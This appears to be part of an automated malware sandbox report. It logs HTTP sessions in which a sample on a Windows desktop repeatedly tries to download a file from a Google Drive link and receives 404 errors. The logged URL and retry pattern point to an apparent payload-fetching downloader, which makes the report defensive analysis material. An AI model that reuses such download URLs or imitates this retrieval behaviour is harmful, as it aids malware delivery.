                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7dex4EYLaJpvfC7NMmr4MRAC3ru8U9uzOw3tNgwArQL5hqjc2gZbPwvPZhZ2QtrNM2zV4dQc2bkA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 33 6c 48 39 5a 37 38 35 35 6b 6a 4e 30 59 77 53 6d 4a 69 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y3lH9Z7855kjN0YwSmJi6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.11.2049811142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:36 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:37 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:37 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Ff15Zi-EgfSrbeUA5LNPAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.11.2049812142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:37 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:37 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:37 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-uCoUTF2a_GYBEUlDdKGlcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7MbuDB0N3d-oWBCrkLsSpynXVdBlel4wPreBjqfrWKwsL2H50bEuga4RPOGT7GnNDJ1E4CqSmu4Q
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 31 42 49 32 6e 70 63 74 38 33 52 53 31 58 32 35 48 69 6c 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C1BI2npct83RS1X25Hil0g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.11.2049813142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:48 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:48 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-sv5fWaz_QcqTSD2BalFEbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.11.2049814142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:48 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:48 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:48 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-SvCIib4xIIGOMaB8VGxvpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC53MR9wRBGHqPY0M1JN37EVuAwQFnIpEbFHzrUSqaPnpC6-dvrvXQ0Rdwx3NVSWIfmx40M
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 71 4c 73 76 69 5a 4b 38 41 4e 39 62 63 41 79 73 48 75 4d 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1qLsviZK8AN9bcAysHuMsw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.11.2049815142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:59 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:59 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-wW-E9UJPxeRwHoKucCPoeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.11.2049816142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:08:59 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:00 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:00 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-YHu4JF1huwsJQVHxQCU7gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4kktxTQnTKX-5zL0iksR_VI3daODD0HP2upn29js632xsopr-GLznrMLkEjE6vvYKUAsuHUbw9JQ
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:09:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 49 58 6a 4a 73 79 48 38 61 5f 67 76 56 79 66 49 39 45 2d 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vIXjJsyH8a_gvVyfI9E-Nw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.11.2049817142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:09:10 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-QanH7FVhikG_X6ZkdQ2JqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
